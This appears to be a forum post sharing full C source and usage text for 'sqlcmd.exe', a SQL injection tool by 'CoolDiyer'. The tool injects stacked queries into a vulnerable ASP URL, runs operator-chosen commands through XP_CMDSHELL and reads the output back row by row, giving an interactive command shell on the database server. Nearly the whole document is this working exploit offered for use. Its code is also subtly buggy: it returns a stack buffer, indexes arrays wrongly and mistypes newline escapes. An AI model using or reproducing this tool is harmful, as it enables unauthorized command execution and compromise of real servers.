Sql注入SA权限CMD终结者+C源码
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#include <stdlib.h>
#pragma comment(lib, "wininet.lib")
char *injurl,*type,*end;
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;
}
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL '%s';insert into [SIC_Tmp] values ('[g_over]')--",injurl,type,cmd);
response=GetResult(url);
while(1){
memset(buff,0,sizeof(buff));
memset(result,0,sizeof(result));
wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then '[CoolDiyer][CoolDiyer]' else '[CoolDiyer]'%%2BResultTxt%%2B'[CoolDiyer]' end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
response=GetResult(url);
if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
else {
puts("Cann't Injection It");
return;
}
strncpy(buff,p+11,p1-p-11);
if (!strcmp(buff,"[g_over]")){
wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
GetResult(url);
return;
}
//filter
for(i=0,j=0;i<strlen(buff);i++,j++){
if(buff=='&' && buff[i+2]=='t' && buff[i+3]==';'){
if (buff[i+1]=='l')result[j]='<';
if (buff[i+1]=='g')result[j]='>';
i+=3;
}
else if(buff=='&' && buff[i+1]=='q' && buff[i+2]=='u' && buff[i+3]=='o' && buff[i+4]=='t' && buff[i+5]==';'){
result[j]='"';
i+=5;
}
else result[j]=buff;
}
puts(result);
memset(url,0,sizeof(url));
n++;
}
}
void main(int argc,char **argv)
{
char cmd[1024];
printf("=[Sql Inj CMD]======================================================/n");
printf("/tSQL Injection Command Exploit Powered By CoolDiyer/n/n");
if(argc!=3){
printf("/tUsage: sqlcmd.exe <InjURL> <type>/n");
printf("/t/tType:/t0->Number 1->char 2->Search/n");
printf("/tExample:/n/t/tsqlcmd.exe http://localhost/index.asp?id=1 0/n");
printf("=05-12-22===========================================================/n");
return;
}
injurl=argv[1];
if(atoi(argv[2])==0){
type="";
end="";
}
if(atoi(argv[2])==1){
type="'";
end=" and ''='";
}
if(atoi(argv[2])==2){
type="%'";
end=" and '%'='";
}
while (1)
{
printf("Sql Inj CMD>");
gets(cmd);
if (!strcmpi(cmd,"exit"))return;
ExecCommand(cmd);
}
}
----------------------------------------------------------
Sql注入SA权限CMD终结者+C源码
=[Sql Inj CMD]======================================================
SQL Injection Command Exploit Powered By CoolDiyer
Usage: sqlcmd.exe <InjURL> <type>
Type: 0->Number 1->char 2->Search
Example:
sqlcmd.exe http://localhost/index.asp?id=1 0
by:cooldiyer